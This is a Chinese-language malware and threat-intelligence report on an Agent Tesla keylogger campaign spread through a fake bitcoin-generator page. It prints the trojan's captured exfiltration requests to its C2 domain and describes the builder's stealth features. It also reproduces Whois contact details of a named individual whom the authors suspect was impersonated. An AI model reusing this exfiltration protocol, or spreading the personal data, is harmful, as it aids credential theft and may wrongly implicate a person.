Zi 字媒體

概述行文之前先界定兩個概念。羊毛黨，指關注與熱衷於「薅羊毛」的群體，是指那些專門選擇企業的營銷活動、廣告投放等，以低成本甚至零成本來換取高額獎勵的人。早期網站站上利用虛假點擊來獲取廣告受益，到現在利用各種營銷機制漏洞、程序漏洞來「薅」企業推廣的費用的兩類群體，本文都統稱為「羊毛黨」。比特幣，英語Bitcoin，是一種全球通用的互聯網加密數字貨幣，與傳統的由特定機構發行或控制的中心化虛擬貨幣不同，比特幣採用點對點網路開發的區塊鏈技術，具有去中心化、匿名不易追蹤的特點，因此很多黑客利用比特幣逃避交易跟蹤，比如wannacry等總眾多勒索軟體作者。當比特幣作為新興電子資產被越來越多的人了解和使用時，熱愛新鮮事物的羊毛黨們靠著敏銳的嗅覺也開始推陳出新，一邊利用比特幣來進行交易逃避監管，一邊利用各種「薅羊毛」方式來賺取比特幣積累財富。然而，在這個行業繁榮的背後，隱藏著另一神秘的群體，如同太極里的陰陽，有光明必有黑暗，有繁榮必有摧毀繁榮，這個神秘的群體寄居在「羊毛黨」之上，貪婪地薅著同樣貪婪地「羊毛黨」的羊毛。近期，東巽科技2046Lab利用東巽威脅情報中心的全球C2（也稱C&C，Command and Control Server縮寫，指木馬的控制和命令伺服器）監控平台，就跟蹤到這樣一批神秘群體。東巽的全球C2監控平台，實時監控著採集到的全球C2的存活狀態。2046Lab的安全研究員通過演算法，在監控結果中發現了一批非常相似類型C2上線。通過對這些C2進行深入跟蹤分析后，發現了一些有趣的現象，某個C2區區幾百個受害者，但被竊取的帳號密碼卻有近十萬對，如下圖。據此，我們推測這些受害者應該不是普通的網民，於是對整個C2、受害者和攻擊者進行了全面深入的分析。圖 C2控制中心截圖C2與木馬分析2.1 C2與釣魚頁面本次發現的C2主要位於域名a-work.info下，該域名下有3個C2，且登陸界面一樣，基本斷定三個C2屬於同一個組織操控，並攻擊了不少受害者，如下表。C2受害者總量密碼總量logger總量32292530162132434995439308010487-攻擊者是如何攻下這些受害者？我們通過跟蹤分析發現，攻擊者製造了非常精美的比特幣相關釣魚頁面，並託管在和兩個地址，引誘受害者下載釣魚頁面提供的「比特幣生成器」，如下圖。圖 「比特幣生成器」釣魚網頁然而，這款「比特幣生成器」實際上是一個名為Agent Tesla的Keylogger類型木馬，其功能主要有竊取瀏覽器、郵件、FTP等密碼，收集鍵盤記錄、粘貼板信息，獲取截屏和網路攝像頭。受害者一旦被植入該木馬，則會將上述密碼、信息發送到a-work.info下某個C2控制中心。2.2 木馬流量分析安全研究員從上述釣魚頁面下載了所謂的「比特幣生成器」，運行後進行了流量分析。在捕獲的數據包中，可以明顯的看到木馬連回a-work.info站點，如下圖。圖 木馬執行后回連C2同時，捕獲到以下數據包：1、發送受害者基本信息到伺服器,關鍵參數為type=info，其他hwid為唯一編號，pcname為用戶名和計算機名稱。POST /steamx/post.php HTTP/1.1Host: a-work.infoUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Length: 157Content-Type: application/x-www-form-urlencodedExpect: 100-continueX-Lantern-Version: 3.7.4Accept-Encoding: gzip type=info&hwid=FCE7-4911-DBB4-64F8-E31F-B2BB-8084-F2C8&time=2017-07-28 10:43:52&pcname=Administrator/i-3511je5j&logdata=&screen=&ipadd=&webcam_link=&client=&link=&username=&password=&screen_link=2、每隔2分鐘發送一次心跳包，關鍵參數為type=update。type=update&hwid=FCE7-4911-DBB4-64F8-E31F-B2BB-8084-F2C8&time=2017-07-28 10:54:06&pcname=Administrator/i-3511je5j&logdata=&screen=&ipadd=&webcam_link=&client=&link=&username=&password=&screen_link=3、發送屏幕截圖，關鍵參數為type=screenshots,數據欄位為screen，截圖數據數據量較大，內容用｛$data｝代替。type=screenshots&hwid=FCE7-4911-DBB4-64F8-E31F-B2BB-8084-F2C8&time=2017-07-28 11:04:06&pcname=Administrator/i-3511je5j&logdata=&screen={$data}&ipadd=&webcam_link=&client=&link=&username=&password=&screen_link=4 、發送鍵盤記錄和粘貼板記錄，關鍵參數為type=keylog，數據欄位為logdata，內容較多用{$data}代替。type=keylog&hwid=FCE7-4911-DBB4-64F8-E31F-B2BB-8084-F2C8&time=2017-07-28 11:04:06&pcname=Administrator/i-3511je5j&logdata={$data}&screen=&ipadd=&webcam_link=&client=&link=&username=&password=&screen_link=5、發送竊取的密碼，關鍵欄位為type=passwords，數據欄位為username和password，內容較多用較多用{$data}代替。type=passwords&hwid=FCE7-4911-DBB4-64F8-E31F-B2BB-8084-F2C8&time=2017-07-28 11:04:06&pcname=Administrator/i-3511je5j&logdata=&screen=&ipadd=&webcam_link=&client=&link=&username=&password={$data}&screen_link=綜合以上數據可以看到，木馬的流量中關鍵指令為type=info/update/screenshots/keylog/passwords，每一次通信過程中，數據欄位都有hwid、pcname、logdata、screen、ipadd、webcam_link、client、link、username、password、screen_link，網關類的設備可以此為基礎來生成檢測和阻斷規則。2.3 木馬行為分析安全研究員同時對木馬運行后的行為進行了分析，捕獲到以下木馬特徵行為：1、木馬啟動后偽造報錯信息並複製自身到C:\Users\當前用戶\AppData\Local\Temp目錄，然後自刪除。圖 釋放文件2、修改註冊表，並將自己添加到啟動項中。圖 修改鍵盤鉤子2.4 木馬生成器分析根據木馬的行為分析來看，這款木馬還是具有很明顯的木馬特徵，按道理很多殺軟應該可以輕易的查殺，但為什麼還是有不少受害者中招，抱著這個好奇心以及本著透徹分析的原則，東巽2046Lab的安全研究員對木馬的生成器進行了分析。由於沒有捕獲到本次攻擊者使用的生成器，考慮到和官方的生成器存在一致性，便對官方的生成器進行分析做參考。Agent tesla是一款市面上公開的keylogger類型木馬，其官網為，如下圖。透過官網可以看到，頁面做得非常專業，提供木馬的同時提供web panel管理頁面和私有加密；支持全系列Windows系統；服務也是非常周到，提供自動購買、激活和7x24小時的支持，可以算是達到了SasS行業的標準。安全研究員對生成器的分析結果如下：1、木馬支持WEB、FTP、郵件三種數據接收方式，很明顯本次跟蹤到的C2採用了web接收方式。圖 數據發送方式配置2、木馬的記錄器（LOGGER）功能可進行任意配置，如鍵盤記錄、粘貼板記錄、截屏、攝像頭拍照，正好印證了木馬流量分析結果。圖 木馬記錄器配置3、木馬竊取密碼種類繁多，幾乎涵蓋了主流的瀏覽器、郵件客戶端（連國內常用的foxmail都包含了）和一些ftp、Winscp等管理工具，並可以隨意配置。圖 木馬竊取密碼配置4、木馬生成器的常見配置中還包括了安裝時bypass UAC，直接殺進程、禁用任務管理器、系統恢復等功能，甚至可配置運行后偽裝成提示、報錯等功能來迷惑受害者。圖 安裝配置圖 安裝后提示信息33.1 行業分析如前述，根據受害者數量和密碼數量的比值，推測受害者不是普通網名。於是安全研究員將受害者的數據進行整理和統計，發現了更加有意思內容，大部分單個受害者的賬號和密碼數量都很大，甚至某單個受害的帳號密碼居然高達9510條。受害者是誰，做什麼行業需要大量的賬號和密碼？安全研究員對受害者賬號密碼對應的站點進行了統計，截取了總量前20的網站：序號網站出現數量15992588341443515/30863077294828392791027911255122541323614235152301621717214182141921320213 排除常見的郵箱、社交站點外，安全研究員分析了靠前幾個站點。其中： (英語)，註冊進去后發現這個網站功能齊全，包括投資、賭博、推廣等內容，經營行業橫跨金融理財、賭博、挖礦等行業。圖 freebitco.in站點https://freedoge.co.in/（英文），是一個免費獲取dogecoins（國內稱「狗幣」）的站點。圖 adbtc.top站點 (俄語)，是個雲挖礦類型的網站，靠售賣算力盈利，同時也提供推廣，返利按級別分別為20%，10%，3%，2%，1%。圖 kapitalof.com站點通過以上網站分析，受害者訪問多是和比特幣等虛擬幣相關的網站，結合木馬偽裝成「比特幣生成器」來看，我們認為受害者主要是跟虛擬貨幣相關的「羊毛黨」，從事SEO、廣告、挖礦、薅羊毛等網賺項目。3.2 地域分析受害者共計645個，通過分析受害者的IP地理位置信息，發現受害者主要來自俄語系國家，其中又以俄羅斯為最為嚴重，佔到了近一半的比例，這也印證了上述站點中為何mail.ru排名靠前，且vk.com和yandex.ru等典型俄語系社交站點也靠前。圖 受害者國家分佈圖 受害者地理位置分佈44.1 地域分析安全研究員對攻擊者進行了一定時間的跟蹤，根據跟蹤到的攻擊者的操作日誌提取到信息來看，攻擊者是有一定經驗的熟手，經常會利用VPN來管理C2。排除VPN后，綜合攻擊者使用的瀏覽器語言，推測攻擊者的真實IP可能為194.165.18.*，目前可能生活在俄羅斯，常使用VyprVPN來隱藏身份，母語為俄語。圖 攻擊者位置和系統4.2 身份分析C2的域名a-work.info存活時其IP指向185.28.102.63，隸屬於forpsicloud.sk雲服務商，位於捷克的一個機房中，說明攻擊者購買的是雲主機。這個網站的主要語言以俄語為主，符合上述攻擊者語言為俄語推斷。file-loader.download和uljob.info設置了域名隱私保護，但通過對a-work.info的Whois信息進行查詢，截取了以下重要信息：Domain name: a-work.infoRegistrar URL: http://www.namecheap.comUpdated Date: 2017-07-30T04:49:51.00ZCreation Date: 2017-02-13T09:34:23.00ZRegistrar Registration Expiration Date: 2018-02-13T09:34:23.00ZDomain Status: clientTransferProhibited Registrant Name: David KazaryanRegistrant Organization: Registrant Street: 1 Sovetskiy Pereylok Registrant City: ChelkovoRegistrant State/Province: Moskovskaya oblRegistrant Postal Code: 121000Registrant Country: RURegistrant Phone: +7.9507287546Registrant Email: mr.omon@inbox.ruRegistry Admin ID: 3zb5xw53ltduhlgzAdmin Name: David Kazaryan根據以上註冊人、註冊郵箱、電話等信息，進行了反查得到了其他幾個域名，整理后關係如下：圖 C2域名反查結果 整理后詳細信息如下表：Domaina-work.infodkazaryan.orgdkazaryan.info註冊人David KazaryanDavid KazaryanDavid KazaryanDavid Kazaryan註冊郵箱mr.omon@inbox.rukazaryandesign@gmail.com註冊電話+7.9507287546+1.2482590389+1.2482590389+1.2482590389註冊國家RUUSUSUS創建時間2017-02-13T09:34:23Z 2017-01-22T04:52:27Z2017-01-22T04:19:16Z2017-01-22T04:19:12Z過期時間2018-02-13T09:34:23Z2019-01-22T04:52:27Z2018-01-22T04:19:16Z2018-01-22T04:19:12Z最近更新時間2017-07-30T04:49:51Z 2017-01-22T04:52:28Z2017-03-24T03:46:12Z2017-03-23T20:31:38Z供應商指向IP185.28.102.6350.63.202.3650.63.202.44184.168.221.46通過上述信息可以看到，所有的域名都指向名叫David Kazaryan的人，並且可以肯定的是：kazaryandavid.com、dkazaryan.org、dkazaryan.info一定隸屬於同一個人，理由是：1) 註冊郵箱都是kazaryandesign@gmail.com。2) 註冊電話都是+1.2482590389。3) 註冊時間非常接近，都是2017-01-22 04點左右，甚至可以推測dkazaryan.org、dkazaryan.info是一次提交，選擇的兩個域名註冊申請，因為註冊時間、過期十分接近，其他信息完全一樣。如果a-work.info和其他三個域名一樣，都是同一個人，那基本可以鎖定攻擊者的真實身份。於是我們通過社交站點找到了David Kazaryan這個人，如下圖。圖 David Kazaryan資料從資料看，David Kazaryan是一名設計師，2012年從美國某大學大學部畢業，推算至今28歲左右，俄語流利。同時，我們嘗試對mr.omon@inbox.ru郵箱進行密碼找回，發現其附加的找回郵箱是隨意填寫的地址，除此之外，暫未找到其他與該郵箱有關信息，推測該郵箱可能是一個臨時申請郵箱。圖mr.omon@inbox.ru郵箱的密碼找回 綜合以上信息，從C2站點a-work.info的分析結果，我們推測攻擊者位置為俄羅斯，母語為俄語。雖然其註冊人為David Kazaryan，並且個人資料中俄語流利，但綜合來看更像美國人。考慮到我們暫未找到其與a-work.info其他交集的信息的情況下，雖然不能排除David Kazaryan（kazaryandesign@gmail.com）的嫌疑，但我們更傾向於認為攻擊者僅僅冒用了David Kazaryan這個名字。4.3 時間線分析整理C2域名創建、釣魚網站域名創建和受害者數據日期統計后，得到下圖：圖 部署和數據時間線從圖可以看出，攻擊者在2月開始進行C2和釣魚站點域名申請和部署，3月開始投入使用，7月13日不管是受害者上線量，還是密碼和記錄器數據，都到達了數據頂峰（7月5日之前密碼和記錄器數據已被轉移），說明在7月中旬是攻擊者最活躍的時期。4.4 意圖分析綜合以上信息：釣魚頁面為比特幣生成器頁面，木馬是一款密碼記錄器，受害者為SEO、挖礦等羊毛黨，且被竊取的數據多為比特幣錢包地址和密碼，再結合近半年比特幣行情飆升來看，可以斷定：攻擊者的意圖是盜取羊毛黨們的比特幣等虛擬貨幣資產，自己賺一筆。總結從上述分析結果來看，本例C2完全定性為一起「黑產」事件，不過和以往見到的黑產不太一樣的是，這起黑產針對的是「羊毛黨」，略帶點「黑吃黑」的黑幫劇情。使用的技術不算高深，但依然有效，TTPs簡要總結如下：表 TTPs總結關鍵項本次攻擊事件情況說明主要攻擊目標SEO、挖礦、廣告聯盟等羊毛黨目標國家俄羅斯為主，以及周邊俄語系國家關鍵作用點個人PC電腦攻擊手法釣魚頁面->Agent telsa木馬攻擊目的竊取網站賬號和密碼，盜取比特幣等虛擬貨幣資產漏洞使用情況無免殺技術直接購買的定期更新的Agent telsa，本身具備較強的免殺和迷惑性活躍程度2月開始部署，3月開始投放並有上線，7月中旬達頂峰反追蹤能力有一定的跟蹤能力，利用vpn來訪問C2頁攻擊源位於俄羅斯（194.165.18.*）的俄語系攻擊者，有一定的可能性叫David Kazaryan。 此外，從這起事件來看，可以預見木馬即服務（MaSS）會越來越熱，黑產的上下游越來越清晰，也越來越專業，逐漸演變成一種標準化的軟體服務，致使攻擊變得更加簡單和低成本，攻擊者無須自行開發木馬，也無須私下聯繫木馬開發者，想要實施一次攻擊，只需要在互聯網上買一個月就好了。所以，東巽科技建議用戶盡量不要下載使用來源不明的軟體和工具，尤其是破解、網賺一類，這些常常是木馬偽裝的重災區，當你在考慮輕鬆賺錢或者免費使用付費軟體的時候，也正是被攻擊者盯上的時候。如果你的數據資產很敏感很重要，建議加強網路安全方面的建設，並邀請專業的安全團隊進行定期的安全檢測。 註：東巽全球C2監控平台，是東巽科技自研的一個全球C2的存活狀態的監控平台，用於監控C2的存活情況和分析攻擊者的活躍程度，為用戶提供威脅情報。東巽2046Lab，是東巽科技的一個安全研究實驗室，主要從事樣本研究、異常流量研究、Web攻防研究、C2跟蹤等網路安全方面的研究。完整報告請點擊閱讀原文撰稿：2046Lab@東巽科技 編輯：唐學菲【推薦閱讀】☞【安在專訪】做一件事要多久？張耀疆說，十年